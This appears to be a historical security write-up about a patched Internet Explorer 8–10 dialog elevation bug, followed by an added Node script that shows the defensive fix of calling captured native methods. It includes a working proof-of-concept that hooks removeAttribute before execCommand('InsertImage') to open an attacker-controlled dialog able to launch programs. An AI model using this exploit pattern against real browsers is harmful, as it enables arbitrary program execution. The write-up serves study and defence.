This was a variation of an earlier internal dialog elevation bug that still worked after the initial patch. By overriding removeAttribute on an element before calling document.execCommand("InsertImage"), the internal dialog could be hijacked to open a modeless dialog under attacker control — and that dialog could then launch arbitrary programs.

<img id="c2eec6217e1a474eb649bfedd577334a">
<img id="c2eec6217e1a474eb649bfedd577334a">
<script language="JavaScript">
document.all.c2eec6217e1a474eb649bfedd577334a.removeAttribute = function tricked_removeAttribute(a,b,c)
{
    if (!window.fRunOnce)
    {
        win = showModelessDialog("shell.html", window, "dialogwidth=400px");
        window.fRunOnce = true;
    }
}
function main()
{
    if (window.fRunOnce)
    {
        alert("Refresh the page and retry");
        return;
    }
    document.execCommand("InsertImage",1,1);
}
</script>
<input type="button" onclick="main();" value="Run Notepad">

The trick was hooking removeAttribute on the image element before execCommand fired. When the internal InsertImage dialog tried to clean up that element, the override intercepted the call and opened a modeless dialog. Unlike the earlier version, which relied on caller.constructor, this one avoided that mechanism entirely, making it work across IE8, IE9, and IE10.
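The root cause described above, shown from the defender's side as an added example that is not part of the original post and not Microsoft's actual fix: privileged code that looks a method up on a page-owned object ends up calling whatever the page put there. `FakeElement`, `cleanupNaive` and `cleanupHardened` are hypothetical names, and the element is a constructed stand-in so the script runs under Node without a DOM.

```javascript
// Constructed stand-in for a DOM element; not IE's real object model.
class FakeElement {
  constructor(id) { this.attrs = { id }; }
  removeAttribute(name) { delete this.attrs[name]; }
}

// Captured before any untrusted script runs, so later tampering cannot change them.
const nativeRemoveAttribute = FakeElement.prototype.removeAttribute;
const apply = Reflect.apply;
const hasOwn = Object.prototype.hasOwnProperty;

// Naive cleanup: resolves the method on the page-owned object, so an own
// property placed there by the page runs inside the privileged caller.
function cleanupNaive(el) {
  el.removeAttribute("id");
}

// Hardened cleanup: never calls through the untrusted object's property.
// Returns true when the element's removeAttribute had been shadowed.
function cleanupHardened(el) {
  const shadowed = apply(hasOwn, el, ["removeAttribute"]);
  apply(nativeRemoveAttribute, el, ["id"]);
  return shadowed;
}

// Builds an element whose removeAttribute was replaced, as the page script does.
function makeHookedElement(log) {
  const el = new FakeElement("tmp");
  el.removeAttribute = function () { log.push("page callback ran"); };
  return el;
}

function demo() {
  const naiveLog = [], hardenedLog = [];
  const a = makeHookedElement(naiveLog);
  cleanupNaive(a);
  const b = makeHookedElement(hardenedLog);
  const flagged = cleanupHardened(b);
  return {
    naiveRanCallback: naiveLog.length === 1,       // page code ran in the caller
    naiveIdStillSet: "id" in a.attrs,              // and the cleanup never happened
    hardenedRanCallback: hardenedLog.length === 1, // page code never ran
    hardenedIdStillSet: "id" in b.attrs,           // cleanup completed
    flagged,                                       // tampering was detected
  };
}
```

The same rule applies to any privileged script that touches objects owned by less-trusted content: capture the native methods in the trusted context and invoke them explicitly instead of resolving them on the untrusted object.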

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.